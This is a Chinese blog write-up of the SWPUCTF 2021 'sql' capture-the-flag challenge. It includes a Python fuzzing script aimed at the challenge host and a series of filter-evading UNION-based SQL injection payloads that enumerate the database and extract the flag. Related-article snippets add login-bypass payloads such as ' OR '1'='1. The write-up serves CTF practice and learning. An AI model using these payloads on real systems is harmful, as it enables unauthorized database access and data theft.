[SWPUCTF 2021 新生赛]sql

最新推荐文章于 2024-05-09 20:55:15 发布
最新推荐文章于 2024-05-09 20:55:15 发布
阅读量887 收藏 8
点赞数 3
文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_70819573/article/details/129309578
版权
文章讲述了在发现一个可能的SQL注入漏洞后,利用Python脚本进行Fuzz测试的过程。通过发送包含SQL关键字的请求,识别出被过滤的字符,并构建特殊的payload来绕过过滤,以揭示数据库信息,如字段、数据库名、表名和列名。虽然能读取部分flag,但无法获取完整数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.打开环境,查看源代码。

发现变量wllm,传入1‘发现报错,是sql注入,进行fuzz测试

一个简单的python脚本

import requests
fuzz={'length ','+','handler','like','select','sleep','database','delete','having','or','as','-~','BENCHMARK','limit','left','select','insert'
,'sys.schema_auto_increment_columns','join','right','#','&','&&','\\','handler','---','--','--+','INFORMATION','--',';','!','%','+','xor','<>'
,'(','>','<',')','.','^','=','AND','BY','CAST','COLUMN','COUNT','CREATE','END','case',"'1'='1'",'when',"admin'",'length','+','REVERSE','ascii'
,'select','database','left','right','union','||','oorr','/','//','//*','*/*','/**/','anandd','GROUP','HAVING','IF','INTO','JOIN','LEAVE','LEFT'
,'LEVEL','sleep','LIKE','NAMES','NEXT','NULL','OF','ON','|','infromation_schema','user','OR','ORDER','ORD','SCHEMA','SELECT','SET','TABLE','THEN'
,'UPDATE','USER','USING','VALUE','VALUES','WHEN','WHERE','ADD','AND','prepare','set','update','delete','drop','inset','CAST','COLUMN','CONCAT'
,'GROUP_CONCAT','group_concat','CREATE','DATABASE','DATABASES','alter','DELETE','DROP','floor','rand()','information_schema.tables','TABLE_SCHEMA'
,'%df','concat_ws()','concat','LIMIT','ORD','ON'
,'extractvalue','order','CAST()','by','ORDER','OUTFILE','RENAME','REPLACE','SCHEMA','SELECT','SET','updatexml','SHOW','SQL','TABLE','THEN','TRUE','instr'
,'benchmark','format','bin','substring','ord','UPDATE','VALUES','VARCHAR','VERSION','WHEN','WHERE','/*','`',',','users','%0a','%0b','mid','for','BEFORE','REGEXP'
,'RLIKE','in','sys schemma','SEPARATOR','XOR','CURSOR','FLOOR','sys.schema_table_statistics_with_buffer','INFILE','count','%0c','from','%0d','%a0','=','@','else'}
for i in fuzz:
    res = requests.get('http://1.14.71.254:28315/?wllm={}'.format(i))
    if '请勿非法操作'  in res.text:
        print(i)

结果:

update
AND
DELETE
UPDATE
insert
updatexml
length 
delete
right
extractvalue
REVERSE
sys schemma
+
=
--+
left
handler
substring
rand()
LEFT
anandd
OUTFILE
INTO
'1'='1'

发现=和空格都被过滤了

于是有payload:

-1'/**/order/**/by/**/4%23(爆字段,用%23代替#,/**/代替空格)
-1'/**/union/**/select/**/1,database(),3%23(爆库)
-1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables /**/where/**/table_schema/**/like()%23(爆表) 
-1'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like()%23(爆列)
-1'/**/union/**/select/**/1,flag,3/**/from/**/''%23发现只能读取一部分flag
-1'/**/union/**/select/**/1,mid(group_concat(id,flag)20,40),3/**/from/**/''%23提取完整flag

知识点:

1.fuzz测试

2.sql注入

3.mid函数的使用

ha0cker
关注
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 962
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 1200
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[SWPUCTF 2021 新生]easy_sql
zoixsoadji的博客
05-06 1571
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
[SWPUCTF 2021 新生]web 解题思路,实操解析,解题软件,解题方法
09-06
SWPUCTF 2021新生web项目中,参者遇到了一系列与SQL注入有关的挑战。SQL注入是一种常见的网络安全攻击方式,攻击者通过在Web表单输入或URL查询字符串中输入恶意的SQL代码,可以对数据库执行未授权的操作。...
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
2301_79326813的博客
02-10 1082
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
NSS [SWPUCTF 2021 新生]sql
Jay17的博客
10-26 829
NSS [SWPUCTF 2021 新生]sql
sql [SWPUCTF 2021 新生]easy_sql
m0_75178803的博客
12-21 575
打开题目,直接查看源代码给了提示注入点是wllm。输入1' 报错,说明注入点是字符型注入。我们知道表名有test_tb和users。同样这道题也可以用sqlmap跑一下看看。然后得到了name和password。我们知道数据库名为test_db。我们选择test_tb进行爆破。看见有id和flag两个字段。爆破数据显示位为2,3。我们直接爆破数据库名。
NSSCTF | [SWPUCTF 2021 新生]easy_sql
2302_80946742的博客
05-09 491
因为extractvalue()函数只能返回32个字符,因此我们使用substring()函数解决这个问题:例如substring("abc",1,1),此语句表示从第一个字符读取一个字符返回,在上面的payload中,我们得到的数据中,从第一个字符起读取30个字符返回。打开题目,提示输入一些东西,很显眼的可以看到网站标题为“参数是wllm”我们已经知道了字段数,直接爆库名(注意最后的空格)已经看到了flag字段,直接查看数据。报错了,可以判断为单引号闭合。可以看到一半的flag,然后爆表名(注意空格)
SWPUCTF 2021 新生 easy_sql
最新发布
03-25
### 关于 SWPUCTF 2021 新生 easy_sql 的解题思路 SQL 注入是一种常见的安全漏洞,攻击者通过向应用程序输入恶意 SQL 查询来获取敏感数据或执行未经授权的操作。对于 SWPUCTF 2021 新生中的 `easy_sql` 题目,其核心在于利用 SQL 注入技术绕过登录验证机制并访问隐藏的数据。 #### 登录绕过的常见方法 通常情况下,题目会提供一个简单的登录表单,其中用户名和密码会被拼接到一条 SQL 查询语句中。如果未对用户输入进行适当过滤,则可以注入逻辑条件使查询始终返回真值。例如: 假设原始查询如下: ```sql SELECT * FROM users WHERE username='input_username' AND password='input_password'; ``` 可以通过提交以下 payload 实现绕过: ```plaintext admin' -- - ``` 这会使最终的 SQL 查询变为: ```sql SELECT * FROM users WHERE username='admin' -- -' AND password='input_password'; ``` 由于双连字符 (`--`) 表示注释掉后续部分,因此无论实际密码为何,此查询都会尝试匹配名为 `admin` 的账户[^1]。 #### 提取 flag 数据库字段名猜测 除了基本的身份认证旁路外,在某些场景下还需要进一步探索数据库结构以定位存储标志位的具体位置。此时可采用联合查询 (UNION SELECT) 或错误基注入等方式枚举列数以及对应的表/列名称。 比如当得知存在额外的秘密信息时,可能需要试验不同的组合直到成功检索到目标记录为止。下面给出了一种通用形式用于演示如何附加其他参数至原请求之中从而揭示更多细节: ```sql 1 UNION ALL SELECT null,table_name FROM information_schema.tables-- ``` 以上仅作为理论指导框架,请依据具体环境调整相应策略完成挑战任务。 ```python import requests url = "http://example.com/login" payloads = ["admin' -- -", "' OR '1'='1"] for p in payloads: response = requests.post(url, data={'username':p,'password':'irrelevant'}) if "Welcome" in response.text: print(f"[+] Login bypassed with payload: {p}") break ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值